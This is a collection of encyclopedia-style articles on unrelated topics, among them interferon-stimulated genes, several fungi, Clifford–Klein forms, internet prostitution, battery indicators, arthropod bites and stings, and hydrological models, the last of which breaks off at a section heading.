IFIT gene expression has been observed in response to both DNA and RNA viral infection. IFIT genes suppress viral infection primarily by limiting viral RNA and DNA replication. IFIT proteins 1, 2, 3 and 5 can bind directly to double-stranded triphosphate RNA. These IFIT proteins form a complex that destroys the viral RNA. IFIT1 and IFIT2 directly bind eukaryotic initiation factor 3, which reduces protein translation in the targeted cell by more than 60%. Function ISGs have a wide range of functions used to combat infection at all stages of a pathogen's life cycle. For a viral infection, examples include: prohibiting entry of the virus into uninfected cells, stopping viral replication, and preventing the virus from leaving an infected cell. Another ISG function is regulating the interferon sensitivity of a cell. The expression of pattern recognition receptors like a TLR, or of common signaling proteins like those found in the JAK-STAT pathway, may be upregulated by interferons, making the cell more sensitive to interferons. Because such a large portion of the human genome is regulated by interferon, ISGs have a broad range of functions. ISGs are essential for fighting off viral, bacterial and parasitic pathogens. Interferon stimulates genes that help activate the immune response and suppress infection at almost all stages of infection. Inhibition of viral RNA There are 21 known ISGs that inhibit RNA virus replication. Primarily, ISGs bind to and degrade RNA to prevent viral instructions from being translated into viral proteins. These ISGs can specifically target double-stranded triphosphate RNA, which is distinct from the single-stranded RNA present in human cells. ISGs can also nonspecifically target mRNA and destroy it. Cell-wide mRNA degradation prevents both viral and host proteins from being produced. The mRNAs of IFN-α and other key immune proteins are resistant to this cell-wide degradation, allowing immune signals to continue while translation is inhibited. Apoptotic effects There are 15 known ISGs that help induce apoptosis. It is likely that none of these genes triggers apoptosis alone, but their expression has been linked to apoptosis. Higher expression of ISGs makes the cell more susceptible to natural killer cells. See also Interferome References Cytokines
Interferon-stimulated gene
Chemistry
1,197
24,507,568
https://en.wikipedia.org/wiki/Gymnopilus%20subtropicus
Gymnopilus subtropicus is a species of agaric fungus in the family Hymenogastraceae. Taxonomy and Phylogeny The scientific name for this species is Gymnopilus subtropicus. It was first described by mycologist Lexemuel Ray Hesler in his 1969 monograph "North American Species of Gymnopilus", with the type collections made by Harry D. Thiers near Biloxi, Mississippi in 1959 (Hesler, 1969). This species is classified in the genus Gymnopilus in the family Hymenogastraceae (Matheny et al., 2015). The genus Gymnopilus was established in 1879 by the Finnish mycologist Petter Adolf Karsten (1834-1917). Karsten proposed the name in his book "Bidrag till Kännedom om Finlands Hattsvampar" (Contributions to the Knowledge of Finland's Gilled Fungi) (Karsten, 1879). Gymnopilus fungi are a diverse group of saprobic mushrooms that typically grow on wood (Hesler, 1969). They are characterized by their rusty brown spore prints, yellow to orange gills, and, when present, a typically cobwebby and ephemeral partial veil. Gymnopilus subtropicus' closest relatives are other members of the genus Gymnopilus, although it has not yet been included in molecular phylogenetic studies. Morphology G. subtropicus produces medium-sized mushrooms with yellow, fibrillose caps 1.4-4.5 cm broad. The gills are crowded, broad, and adnate-decurrent. The stipe is 3.5-4 cm long by 3-5 mm thick, enlarged at the base, yellowish above and brownish below. It has a cobweb-like partial veil when young, often remaining on the stipe and forming a ring. Microscopically, it has ellipsoid, dextrinoid spores measuring 5.5-7 x 4-4.5 μm. Gymnopilus subtropicus can be identified by several distinctive features, including yellow cap scales, dextrinoid spores, interwoven cap tissue, and caulocystidia. Similar Species It is similar to G. lepidotus and G. pacificus but differs microscopically. Identifying Gymnopilus species is known to be challenging, even for experts. Ecology G. subtropicus grows on oak and palm logs in subtropical forests across Florida, Mississippi, Louisiana, and Hawaii, fruiting from March to August (Hesler, 1969). Human Uses and Relevance Some Gymnopilus species have psychoactive properties, but the biochemistry of G. subtropicus is unknown. It contributes to decomposition in its native ecosystems. References Hesler, L.R. (1969). North American species of Gymnopilus. Mycologia Memoir No. 3. J. Cramer: NY. 117 pp. Karsten, P.A. (1879). Bidrag till Kännedom om Finlands Hattsvampar. Helsingfors. Matheny, P.B. et al. (2015). Two new genera of Agaricales. Systematics and Biodiversity, 13(1), 28–41. Strauss, D. et al. (2022). Taxonomy, phylogenetics of psychedelic mushrooms. Frontiers in Forests and Global Change, 5, 1–9. subtropicus Fungi of North America Taxa named by Lexemuel Ray Hesler Fungi described in 1969 Fungus species
Gymnopilus subtropicus
Biology
747
55,383,649
https://en.wikipedia.org/wiki/Taper%20burn%20mark
Taper burn marks are deep flame shaped scorch marks often found on the timber beams of early modern houses. They were originally thought to have been accidental scorches from a taper candle, but research suggests that most marks may have been made deliberately, as there is clear patterning of the activity. They are theorised to have been made as part of a folk superstition, then thought to protect the building from fire and lightning. They are often found around entrances to the home such as fireplaces, doors and windows. Over 80 such marks have been discovered in the Tower of London. See also Apotropaic mark References Anthropology of religion Magic symbols Folklore Religious practices
Taper burn mark
Biology
141
797,238
https://en.wikipedia.org/wiki/Clifford%E2%80%93Klein%20form
In mathematics, a Clifford–Klein form is a double coset space Γ\G/H, where G is a reductive Lie group, H a closed subgroup of G, and Γ a discrete subgroup of G that acts properly discontinuously on the homogeneous space G/H. A suitable discrete subgroup Γ may or may not exist, for a given G and H. If Γ exists, there is the question of whether Γ\G/H can be taken to be a compact space, called a compact Clifford–Klein form. When H is itself compact, classical results show that a compact Clifford–Klein form exists. Otherwise it may not, and there are a number of negative results. History According to Moritz Epple, the study of Clifford–Klein forms began when W. K. Clifford used quaternions to twist elliptic space. "Every twist possessed a space-filling family of invariant lines", the Clifford parallels. They formed "a particular structure embedded in elliptic 3-space", the Clifford surface, which demonstrated that "the same local geometry may be tied to spaces that are globally different." Wilhelm Killing thought that for free mobility of rigid bodies there are four spaces: Euclidean, hyperbolic, elliptic and spherical. They are spaces of constant curvature, but constant curvature differs from free mobility: it is local, while free mobility is both local and global. Killing's contribution to Clifford–Klein space forms involved formulation in terms of groups, finding new classes of examples, and consideration of the scientific relevance of spaces of constant curvature. He took up the task of developing physical theories of Clifford–Klein space forms. Karl Schwarzschild wrote "The admissible measure of the curvature of space", and noted in an appendix that physical space may actually be a non-standard space of constant curvature. See also Killing–Hopf theorem Space form References Moritz Epple (2003) From Quaternions to Cosmology: Spaces of Constant Curvature ca. 1873–1925, invited address to International Congress of Mathematicians Lie groups Homogeneous spaces
Clifford–Klein form
Physics,Mathematics
399
66,341,767
https://en.wikipedia.org/wiki/Task%20Force%20on%20Process%20Mining
The IEEE Task Force on Process Mining (TFPM) is a non-commercial association for process mining. The IEEE (Institute of Electrical and Electronics Engineers) Task Force on Process Mining was established in October 2009 as part of the IEEE Computational Intelligence Society at the Eindhoven University of Technology. The task force is supported by over 80 organizations and has around 750 members. The main goal of the task force is to promote the research, development, education, and understanding of process mining. About In 2012, the IEEE World Congress on Computational Intelligence / IEEE Congress on Evolutionary Computation held a session on process mining. Process mining is a field of research that mixes computational intelligence and data mining with process modeling and analysis. Activities and organization The Task Force on Process Mining has a Steering Committee and an Advisory Board. The Steering Committee, chaired by Wil van der Aalst from its inception in 2009, defined 15 action lines. These include the organization of the annual International Conference on Process Mining (ICPM) series, standardization efforts leading to the IEEE XES standard for storing and exchanging event data, and the Process Mining Manifesto, which was translated into 16 languages. The Task Force on Process Mining also publishes a newsletter, provides data sets, organizes workshops and competitions, and connects researchers and practitioners. In 2016, the IEEE Standards Association published the IEEE Standard for Extensible Event Stream (XES), a file format widely accepted by the process mining community. As of 2023, Boudewijn van Dongen serves as chair of the Steering Committee. Wil van der Aalst and Moe Wynn both serve as vice-chair of the Steering Committee. See also Process mining Business process management References Further reading Aalst, W. van der (2016). Process Mining: Data Science in Action. Springer Verlag, Berlin. Reinkemeyer, L. (2020). Process Mining in Action: Principles, Use Cases and Outlook. Springer Verlag, Berlin. Information science Computer occupations Computational fields of study Data analysis
Task Force on Process Mining
Technology
413
42,194,912
https://en.wikipedia.org/wiki/Lyophyllum%20eucalypticum
Lyophyllum eucalypticum is a species of fungus in the family Lyophyllaceae. Found in Australia, it was first described as a species of Tricholoma by English mycologist Arthur Anselm Pearson in 1951. Meinhard Michael Moser transferred it to Lyophyllum in 1986. This white, woolly tropical mushroom is similar to other mushroom species, such as Macrofungus, which looks similar but grows only in Australia. The distinguishing features are its deep purple borders, which are typically trimmed with black rings. It has wide wings that spread out as the mushroom matures. References External links Lyophyllaceae Fungi described in 1951 Fungi of Australia Fungus species
Lyophyllum eucalypticum
Biology
145
75,185,887
https://en.wikipedia.org/wiki/VT%201137-0337
VT 1137-0337 is an extragalactic pulsar wind nebula (possibly a magnetar wind nebula) located 395 million light years from Earth in the dwarf galaxy SDSS J113706.18-033737.1, a galaxy undergoing a burst of star formation. It was created by the supernova of a massive star only 14 to 80 years before its discovery. Formation VT 1137-0337 was formed 14 to 80 years ago when a massive star went supernova, leaving behind a supernova remnant and a young, fast-spinning, pulsar-type neutron star. Neutron star The neutron star at the center of VT 1137-0337 is a fast-spinning, pulsar-type neutron star whose strong magnetic field accelerates charged particles in the surrounding space to nearly the speed of light, producing strong radio emission. Discovery The nebula VT 1137-0337 was discovered using the Very Large Array Sky Survey (VLASS). References Pulsar wind nebulae Leo (constellation) Astronomical objects discovered in 2022
VT 1137-0337
Astronomy
217
43,114,929
https://en.wikipedia.org/wiki/Internet%20prostitution
The Internet has become one of the preferred methods of communication for prostitution, both for its convenience and because clients and prostitutes are less vulnerable to arrest or assault. Origins of Internet advertising During the latter half of the twentieth century, most off-street prostitution was advertised locally using personal advertisements in the printed press or postcards in the windows of commercial premises such as newsagent's shops. As direct references to prostitution were not acceptable, the advertisements were carefully worded with euphemistic terms such as "large chest for sale". In larger cities, tart cards were placed in telephone boxes. By the year 2000, the Internet, and access to it, had grown large enough for some in the sex industry to see it as a marketing tool. As use of the Internet has subsequently grown, so has the use of it by the sex industry. In 2007 Harriet Harman, then Minister for Women in the UK, put pressure on the Newspaper Society, the trade body representing local newspapers, not to carry advertisements for sexual services. As a result, the society updated its guidelines for members in 2008, effectively banning such advertisements. As the majority of local newspapers were members, this ban increased the move towards Internet advertising. Mobile devices such as smartphones have further increased the use of the Internet, both generally and for prostitution websites. In the Netherlands, the Internet had grown in importance by the mid 2010s as a platform for recruiting prostitutes' clients, with escort workers advertising their mobile telephone numbers online. Types of websites Listing sites There has been a rise in the number of escort/prostitution listing websites that advertise for both independent and agency escorts. Some are free, while others charge to add a listing. Others are free for a basic listing but charge for some additional features. A notable example is the website The Erotic Review. Forums Forums were amongst the first sites to be used by escorts. With the rise of other social media, their use has declined. Personal websites It has become simple and easy for independent escorts to create a personal website for the purposes of advertising their prostitution services. Reviews A number of sites have a section where clients can leave reviews for escorts. Some outside the industry regard this as degrading to the escort; however, most involved in the industry do not share this view. The practice of posting online reviews of escorts dates back to 1999, when The Erotic Review, a review site that allows customers to rate their experiences with sex workers, was created. Punternet was originally the foremost review site despite adverse publicity from Harriet Harman and Vera Baird (see below). In recent years, Adultwork has had a larger number of reviews posted. UK Punting, founded in 2010, is a sex worker review website which only includes client comments and has no input from sex workers. Books reviewing the providers of sexual services in the United Kingdom have been published by George McCoy since 1996, and by 2013 McCoy was running a website reviewing over 5,000 massage parlours and individuals. Safety A feature of some early websites, particularly forums, was a section where safety warnings could be posted about dangerous clients, referred to as "dodgy punters" (and, to a lesser degree, bad escorts). As these warnings were spread over about a dozen websites, the process of keeping up to date with the information in them could be time-consuming.
In 2006, talks took place in the industry about setting up a centralised warning website that would be automatically updated from the existing websites by RSS feeds. It was agreed that a newly created website, Saafe, would carry the centralised warnings. The new website launched in January 2007. However, the centralised warnings did not work as well as envisaged and the project was discontinued in 2010. In December 2011, Lynne Featherstone, then Equalities Minister, announced the Home Office would provide £108,000 to establish a national online network to collate and distribute information between schemes that allow sex workers to report violent incidents, known as "Ugly Mugs" schemes. This money was to fund a 12-month pilot scheme run by the UK Network of Sex Work Projects (UKNSWP). On 6 July 2012, the National Ugly Mugs Pilot Scheme was launched. The scheme was a success and continued after the 12-month pilot period. Social media Since the rise of social media, escorts and escort agencies have used sites such as Facebook and Twitter to promote their services. Because of its more relaxed guidelines, Twitter is the most popular. With the rise of social media as a means of communication, the use of forums by sex workers and their clients has fallen. Online payments The rise of online payment systems has enabled escorts and agencies to take payments for services. When PayPal first started in 2001, escorts were amongst its first customers. PayPal subsequently changed its policies and no longer allows escorts to use the system. In 2013, escort agency Passion VIP of Birmingham, England became the first agency to accept the virtual currency Bitcoin. Controversies Punternet In 2009 Harriet Harman asked the then Governor of California, Arnold Schwarzenegger, to close down the Punternet website. She said that it was increasing the demand for prostitution in the UK, an activity which she described as degrading to women and which she said was putting them at risk. Punternet is hosted in California, despite being a review site for prostitution in the UK. Harman's actions did not result in the website being closed down; instead it received an increase in traffic due to the publicity generated. The website owners thanked Harman for the increase in business. In January 2010, at a Westminster Hall debate on violence against women, then Solicitor General Vera Baird again called for the site to be taken down. In 2018 Trishna Datta, an outreach worker from Ilford, Essex, launched a petition to have the Punternet website taken down. She said that the website lacked adequate safety measures to ensure details which could put sex workers in danger were not revealed. Additionally, she expressed concern that some of the sex workers reviewed on the site might be underage or victims of trafficking or sexual assault. Punternet commented that they would report underage prostitutes to the authorities, and that they encourage customers to report underage prostitutes and victims of trafficking to Crimestoppers UK. Bogus escort agencies scam In 2010, Suffolk Trading Standards started Operation Troy, targeting bogus online escort agencies. These agencies promised large earnings in an effort to recruit escorts. A registration fee was charged to those wanting to join, but no work materialised. In July 2013, six members of the gang running this scam were jailed. The leader, Toni Muldoon, was sentenced to seven and a half years. It was estimated the scam netted £5.7m from 14,000 victims.
Adultwork AdultWork is a UK website which allows sex workers to specify the services they provide before being booked for a job. The site is funded by sex workers, who pay to have their profiles displayed. In February 2014, an unnamed Northern Irish woman successfully sued the website for unauthorised use of intimate photographs of herself. She was awarded £28,000 damages. See also Bad date list Prostitution in the United Kingdom References External links National Ugly Mugs Scheme Ireland & UK Ugly Mugs Service Prostitution in the United Kingdom Sexuality and computing
Internet prostitution
Technology
1,473
11,438,601
https://en.wikipedia.org/wiki/Battery%20indicator
A battery indicator (also known as a battery gauge) is a device which gives information about a battery. This will usually be a visual indication of the battery's state of charge. It is particularly important in the case of a battery electric vehicle. Automobiles Some automobiles are fitted with a battery condition meter to monitor the starter battery. This meter is, essentially, a voltmeter, but it may also be marked with coloured zones for easy visualization. Many newer cars no longer offer voltmeters or ammeters; instead, these vehicles typically have a light with the outline of an automotive battery on it. This can be somewhat misleading, as it may be confused for an indicator of a bad battery when in reality it indicates a problem with the vehicle's charging system. Alternatively, an ammeter may be fitted. This indicates whether the battery is being charged or discharged. On one such meter, the ammeter is marked "Alternator" and the symbols are "C" (charge) and "D" (discharge). Both ammeters and voltmeters, individually or together, can be used to assess the operating state of an automobile battery and charging system. Electronic devices A battery indicator is a feature of many electronic devices. In mobile phones, the battery indicator usually takes the form of a bar graph - the more bars that are showing, the better the battery's state of charge. Computers Computers may give a signal to users that an internal standby battery needs replacement. Portable computers using rechargeable batteries generally give the user some indication of the remaining operating time left on the battery. A Smart Battery System uses a controller integrated with an interchangeable battery pack to provide a more accurate indication of the state of battery charge. Batteries not part of a system Batteries that are part of a system, such as computer batteries, can have their properties checked and logged in operation to assist in determining remaining charge. A real battery can be modeled as an ideal battery with a specified EMF, in series with an internal resistance. As a battery discharges, the EMF may drop or the internal resistance increase; in many cases the EMF remains more or less constant during most of the discharge, with the voltage drop across the internal resistance determining the voltage supplied. Determining the charge remaining in many battery types not connected to a system that monitors battery use is not reliably possible with a voltmeter. In battery types where EMF remains approximately constant during discharge but resistance increases, the voltage across the battery terminals is not a good indicator of capacity. A meter such as an equivalent series resistance meter (ESR meter), normally used for measuring the ESR of electrolytic capacitors, can be used to evaluate internal resistance. ESR meters fitted with protective diodes cannot be used: a battery will simply destroy the diodes and damage itself. An ESR meter known not to have diode protection will give a reading of internal resistance for a rechargeable or non-rechargeable battery of any size, down to the smallest button cells, which gives an indication of the state of charge. To use it, measurements on fully charged and fully discharged batteries of the same type can be used to determine the resistances associated with those states. The cost of an ESR meter makes it uneconomic to buy one solely for checking batteries, but a meter used for checking capacitors can take on the additional duty.
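The two-reading method implied by this model can be made concrete. The following minimal Python sketch estimates internal resistance from an open-circuit voltage and a voltage measured under a known load current; the readings shown are hypothetical, not from any particular battery.

```python
# Battery model: V_loaded = EMF - I * R_internal, with EMF approximated
# by the open-circuit voltage.
def internal_resistance(v_open, v_loaded, i_loaded):
    """Estimate internal resistance (ohms) from two voltage readings."""
    return (v_open - v_loaded) / i_loaded

# Hypothetical AA cell: 1.58 V unloaded, 1.48 V while supplying 0.50 A.
r = internal_resistance(v_open=1.58, v_loaded=1.48, i_loaded=0.50)
print(f"estimated internal resistance: {r:.2f} ohm")   # about 0.20 ohm
```

Comparing the value obtained against readings taken from known fully charged and fully discharged cells of the same type, as described above, gives an indication of the state of charge.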
See also Battery management system Smart Battery Data State of health State of charge Smart battery References Indicator Measuring instruments Auto parts
Battery indicator
Technology,Engineering
713
10,295,673
https://en.wikipedia.org/wiki/Fiber%20disk%20laser
A fiber disk laser is a fiber laser with transverse delivery of the pump light. They are characterized by the pump beam not being parallel to the active core of the optical fiber (as in a double-clad fiber), but directed at the coil of the fiber at an angle (usually between 10 and 40 degrees). This allows the specific shape of the pump beam emitted by the laser diode to be exploited, providing efficient use of the pump. Realizations of fiber disk lasers The first fiber disk lasers were developed at the Institute for Laser Science in Japan. Several realizations of fiber disk lasers have been reported. The fiber disk laser is so named because the fiber is tightly coiled. Typically, no special feedback for the laser frequency is required, as the small reflection at the end of the fiber is sufficient to provide efficient operation. In this case, both ends of the coiled fiber can be used as output. Application and power scaling Fiber disk lasers are used for cutting metal (up to a few mm thick), welding and folding. The disk-shaped configuration allows efficient heat dissipation (usually, the disks are cooled with flowing water), allowing power scaling. When increasing the length of the fiber becomes limited by stimulated scattering, additional power scaling can be achieved by combining several fiber disk lasers into a stack. The spiral-coiled configuration is not the only possible arrangement; any other scheme of stacking optical fibers with lateral delivery of the pump can also be called a fiber disk laser, even if the resulting shape of the device is not circular. The term fiber disk laser applies to the concept of lateral delivery of the pump to the active optical fiber rather than specifically to a disk-shaped device. The optimal shape of the fiber disk laser may depend on the properties of the pump beam available, as well as on the specific application. References External links http://www.nature.com/nphoton/journal/vsample/nsample/full/nphoton.2006.6.html IEEE http://sciencelinks.jp/j-east/article/200705/000020070506A1021450.php Solid-state lasers Fiber optics
Fiber disk laser
Chemistry
446
27,090,911
https://en.wikipedia.org/wiki/Arthropod%20bites%20and%20stings
Many species of arthropods (insects, arachnids, millipedes and centipedes) can bite or sting human beings. These bites and stings generally occur as a defense mechanism or during normal arthropod feeding. While most cases cause self-limited irritation, medically relevant complications include envenomation, allergic reactions, and transmission of vector-borne diseases. Signs and symptoms Most arthropod bites and stings cause self-limited redness, itchiness and/or pain around the site. Less commonly (around 10% of Hymenoptera sting reactions), a large local reaction occurs when the area of swelling is greater than . Rarely (1-3% of Hymenoptera sting reactions), systemic reactions can affect multiple organs and pose a medical emergency, as in the case of anaphylactic shock. Defensive and predatory bites and stings Many arthropods bite or sting in order to immobilize their prey or to deter potential predators as a defense mechanism. Stings containing venom are more likely to be painful. Less frequently, venomous spider bites are also associated with morbidity and mortality in humans. Most arthropod stings involve Hymenoptera (ants, wasps, and bees). While the majority of Hymenoptera stings are locally painful, the associated venom rarely causes toxic reactions unless victims receive many stings at once. The low mortality associated with Hymenoptera (around 60 deaths per year in the US, out of millions of stings nationwide, most of them unreported) is mostly due to anaphylaxis from venom hypersensitivity. Most scorpion stings also cause self-limited pain or paresthesias. Only certain species (from the family Buthidae) inject neurotoxic venom, which is responsible for most morbidity and mortality. Severe toxic reactions can occur, resulting in progressive hemodynamic instability, neuromuscular dysfunction, cardiogenic shock, pulmonary edema, multi-organ failure, and death. Although robust epidemiological data is unavailable, global estimates of scorpion stings exceed 1.2 million, resulting in more than 3000 deaths annually. Spider bites most often cause minor symptoms and resolve without intervention. Medically significant spider bites involve substantial envenomation from only certain species such as widow spiders and recluse spiders. Symptoms of latrodectism (from widow spiders) may include pain at the bite or involving the chest and abdomen, sweating, muscle cramps and vomiting, among others. By comparison, loxoscelism (from recluse spiders) can present with local necrosis of the surrounding skin and widespread breakdown of red blood cells. Headaches, vomiting and a mild fever may also occur. Feeding bites Feeding bites have characteristic patterns and symptoms that reflect the feeding habits of the offending pest and the chemistry of its saliva. Feeding bites are less likely to be felt at the time of the bite, although there are some exceptions. Since feeding requires longer attachment to prey than envenomation, feeding bites are more often associated with vector transmission of disease. As vectors of disease In addition to bites and stings causing discomfort in and of themselves, bites can also spread secondary infections if the arthropod is carrying a virus, bacterium, or parasite. The World Health Organization (WHO) estimates that 17% of all infectious diseases worldwide are transmitted by arthropod vectors, resulting in over 700,000 deaths annually.
Diagnosis

Most arthropod bites and stings do not require a specific diagnosis, since they typically improve with supportive management alone. Certain bites and stings present with characteristic appearances and distributions. In general, however, dermoscopic findings of bitten or stung skin rarely aid in diagnosis. Rather, patient history (recent travel to endemic areas, outdoor activities, and other risk factors) primarily guides the diagnostic approach, and can raise clinical suspicion for more serious complications such as vector-borne diseases.

Microscopic appearance

Skin biopsies are not indicated for bites or stings, since the histomorphologic appearance is non-specific. Bites and stings, as well as other conditions (e.g. drug reactions, urticarial reactions, and early bullous pemphigoid), can cause microscopic changes such as a wedge-shaped superficial dermal perivascular infiltrate consisting of abundant lymphocytes and scattered eosinophils.

Prevention

Prevention strategies against arthropod bites and stings comprise personal protection measures, travel advisories, and public health and environmental interventions.

Personal protection

Travelers should seek to minimize outdoor activity during peak arthropod activity times and avoid high-risk areas, such as regions with known outbreaks or epidemics. Standing water and dense vegetation also commonly attract arthropods. Clothing that covers most exposed skin provides a measure of physical protection, which may be augmented when the fabric is treated with a pesticide such as permethrin. The use of topical repellents such as N,N-diethyl-m-toluamide (DEET) is supported by a large body of evidence.

Vaccines may also help prevent vector-borne diseases in eligible patients. For example, Japanese encephalitis, yellow fever, and dengue fever have FDA-approved vaccines available. Since these are relatively new vaccines, however, they are not standard of care as of 2023. Additionally, patients traveling to malaria-endemic regions are routinely prescribed malaria chemoprophylaxis.

Patients with a history of venom hypersensitivity may benefit from venom immunotherapy (VIT). Patients eligible for VIT include those with a prior anaphylactic reaction to a venomous sting who have IgE to venom allergens. VIT can help prevent future severe systemic reactions in select patients.

Global health

International organizations such as the WHO aim to reduce the disease burdens of neglected tropical diseases, many of which are vector-borne. Such campaigns must incorporate multipronged approaches that consider global inequality, access to resources, and climate change.

Management

Most arthropod bites and stings require only supportive care. However, complications such as envenomation and severe allergic reactions can present as medical emergencies.

Supportive care

Local reactions to bites and stings are treated symptomatically. If a stinger is still embedded, manual removal can reduce further irritation. Washing the affected area with soap and water can help reduce the risk of contamination. Oral antihistamines, calamine lotion, topical corticosteroids and cold compresses are common over-the-counter remedies to reduce itchiness and local inflammation.
In more severe cases, such as large local reactions, systemic glucocorticoids are sometimes prescribed, although only limited evidence supports their effectiveness, and there are few data to support one treatment over another.

Medical emergencies

Systemic reactions from venom hypersensitivity can rapidly progress to a medical emergency. The mainstay of anaphylactic shock management is intramuscularly injected epinephrine. The patient should be stabilized and transferred to an intensive care unit. Toxic reactions to envenomation are similarly managed with medical stabilization and symptomatic treatment. Tetanus prophylaxis should be up to date, but antibiotics are typically unnecessary unless a bacterial superinfection is suspected. Antivenoms have been created for certain envenomations, such as Centruroides scorpion stings, but these drugs are not yet widely available and so are typically reserved for severe systemic toxicity. Several vector-borne diseases can present emergently.

Treatment of vector-borne diseases

After confirmation of the diagnosis, antimicrobials are prescribed according to the standard of care.

Biting and stinging arthropods

A bite is defined as coming from the mouthparts of the arthropod, and consists of both the bite wound and the saliva. The saliva of the arthropod may contain anticoagulants, as in insects and arachnids that feed on blood. Feeding bites may also contain an anaesthetic, to prevent the bite from being felt, or digestive enzymes, as in spiders; spider bites have primarily evolved to paralyse and then digest prey.

A sting comes from the abdomen. In most stinging insects (largely hymenopterans), the stinger is a modified ovipositor that protrudes from the abdomen. The sting consists of an insertion wound and venom. The venom is evolved to cause pain to a predator, to paralyse a prey item, or both. Because insect stingers evolved from ovipositors, in most hymenopterans only the female can sting. However, in a few groups of wasps the male has evolved a "pseudo-sting": the male genitalia bear two sharp protrusions that can deliver an insertion wound. Since these deliver no venom, they are not considered a true sting. In ants that bite instead of sting, such as the Formicinae, the bite causes the wound, but during the bite the abdomen bends forward to spray formic acid into the wound, causing additional pain. In arachnids that sting (largely scorpions), the stinger is not a modified ovipositor but a telson borne at the tip of the metasoma. (Scorpions lack an ovipositor entirely and give birth to live young.)
Insects

Diptera (true flies)
Black flies (Simuliidae)
Horse-flies (Tabanidae)
Deer flies / yellow flies (Chrysops)
Tsetse flies (Glossinidae)
Stable flies (Muscidae)
Biting midges or no-see-ums (Ceratopogonidae), including the Highland midge
Mosquitos (Culicidae)
Botflies (as larvae, Oestridae)
Sandflies (Phlebotomidae): Lutzomyia, Phlebotomus
Blow-flies (as larvae, Calliphoridae)
Screw-worm flies (as larvae, Calliphoridae)
Keds (Hippoboscidae)

Hymenoptera (ants, bees and wasps)
Ants: bull ants (sting), fire ants (both bite and sting), bullet ants (sting)
Bees: honeybees (sting), stingless bees (bite), bumblebees (sting)
Wasps (sting): hornets, yellow jackets, paper wasps

Siphonaptera (fleas; bite)
Human flea (Pulex irritans)
Chigoe flea (Tunga penetrans)

Phthiraptera (lice; bite)
Head lice
Body lice
Crab lice

Other insects
Assassin bugs / kissing bugs
Bedbugs
Conenose bugs

Arachnids

Spiders
Mites: chiggers, red poultry mite, spiny rat mite, house mouse mite, northern fowl mite, tropical fowl mite, mange mite (scabies)
Ticks
Scorpions (all species sting)

Myriapoda

Centipedes

References

External links
Identifying insect bites and stings
Diagnosing Mysterious "Bug Bites"

Lists of animals Medical lists Arthropods and humans Parasitic infestations, stings, and bites of the skin Arthropod attacks
Arthropod bites and stings
Biology
2,387
73,960,946
https://en.wikipedia.org/wiki/Retiperidiolia
Retiperidiolia is a genus of fungi in the family Nidulariaceae. Basidiocarps (fruit bodies) are typically under 10 mm in diameter and irregularly spherical. Each produces a number of peridioles which contain the spores and are released from the disintegrating fruit bodies at maturity. Species are usually found growing on herbaceous stems and other plant debris. The genus has a tropical distribution. Species were previously referred to Mycocalia, but molecular research, based on cladistic analysis of DNA sequences, found that they were not closely related. See also List of Agaricales genera References Nidulariaceae Agaricales genera Taxa described in 2022 Fungi
Retiperidiolia
Biology
144
7,668,353
https://en.wikipedia.org/wiki/Amadori%20rearrangement
The Amadori rearrangement is an organic reaction describing the acid- or base-catalyzed isomerization or rearrangement of the N-glycoside of an aldose, or the glycosylamine, to the corresponding 1-amino-1-deoxy-ketose. The reaction is important in carbohydrate chemistry, specifically the glycation of hemoglobin (as measured by the HbA1c test).

The rearrangement is usually preceded by formation of an α-hydroxyimine by condensation of an amine with an aldose sugar. The rearrangement itself entails an intramolecular redox reaction, converting this α-hydroxyimine to an α-ketoamine. The formation of imines is generally reversible, but after conversion to the keto-amine, the attached amine is fixed irreversibly. This Amadori product is an intermediate in the production of advanced glycation end-products (AGEs). The formation of an advanced glycation end-product involves the oxidation of the Amadori product.

Food chemistry

The reaction is associated with the amino-carbonyl reactions (also called the glycation reaction, or Maillard reaction) in which the reagents are naturally occurring sugars and amino acids. One study demonstrated the possibility of Amadori rearrangement during the interaction between oxidized dextran and gelatine.

History

The Amadori rearrangement was discovered by the organic chemist Mario Amadori (1886–1941), who reported the reaction in 1925 while studying the Maillard reaction.

See also
Fructoselysine, the Amadori product derived from glucose and lysine
Glycated hemoglobin, the Amadori product used in the HbA1c diagnostic test for diabetes

References

External links
Amadori Rearrangement, PowerPoint presentation detailing the reaction mechanism

Rearrangement reactions Post-translational modification Name reactions
Amadori rearrangement
Chemistry
416
70,847,281
https://en.wikipedia.org/wiki/Capsulimonas
Capsulimonas is a Gram-negative, non-spore-forming, aerobic and non-motile genus of bacteria from the family Capsulimonadaceae, with one known species (Capsulimonas corticalis). Capsulimonas corticalis has been isolated from the surface of a beech tree (Fagus crenata).

See also
List of bacterial orders
List of bacteria genera

References

Bacteria Bacteria genera Monotypic bacteria genera Taxa described in 2019
Capsulimonas
Biology
99
17,673,401
https://en.wikipedia.org/wiki/Hydrological%20model
A hydrologic model is a simplification of a real-world system (e.g., surface water, soil water, wetland, groundwater, estuary) that aids in understanding, predicting, and managing water resources. Both the flow and quality of water are commonly studied using hydrologic models.

Analog models

Prior to the advent of computer models, hydrologic modeling used analog models to simulate flow and transport systems. Unlike mathematical models that use equations to describe, predict, and manage hydrologic systems, analog models use non-mathematical approaches to simulate hydrology. Two general categories of analog models are common: scale analogs, which use miniaturized versions of the physical system, and process analogs, which use comparable physics (e.g., electricity, heat, diffusion) to mimic the system of interest.

Scale analogs

Scale models offer a useful approximation of physical or chemical processes at a size that allows for greater ease of visualization. The model may be created in one (core, column), two (plan, profile), or three dimensions, and can be designed to represent a variety of specific initial and boundary conditions as needed to answer a question. Scale models commonly use physical properties that are similar to their natural counterparts (e.g., gravity, temperature). Yet, maintaining some properties at their natural values can lead to erroneous predictions. Properties such as viscosity, friction, and surface area must be adjusted to maintain appropriate flow and transport behavior. This usually involves matching dimensionless ratios (e.g., Reynolds number, Froude number).

Groundwater flow can be visualized using a scale model built of acrylic and filled with sand, silt, and clay. Water and tracer dye may be pumped through this system to represent the flow of the simulated groundwater. Some physical aquifer models are between two and three dimensions, with simplified boundary conditions simulated using pumps and barriers.

Process analogs

Process analogs are used in hydrology to represent fluid flow using the similarity between Darcy's law, Ohm's law, Fourier's law, and Fick's law. The analogs to fluid flow are the flux of electricity, heat, and solutes, respectively. The corresponding analogs to fluid potential are voltage, temperature, and solute concentration (or chemical potential). The analogs to hydraulic conductivity are electrical conductivity, thermal conductivity, and the solute diffusion coefficient. An early process analog model was an electrical network model of an aquifer composed of resistors in a grid. Voltages were assigned along the outer boundary and then measured within the domain. Electrical conductivity paper can also be used instead of resistors.

Statistical models

Statistical models are a type of mathematical model commonly used in hydrology to describe data, as well as relationships between data. Using statistical methods, hydrologists develop empirical relationships between observed variables, find trends in historical data, or forecast probable storm or drought events.

Moments
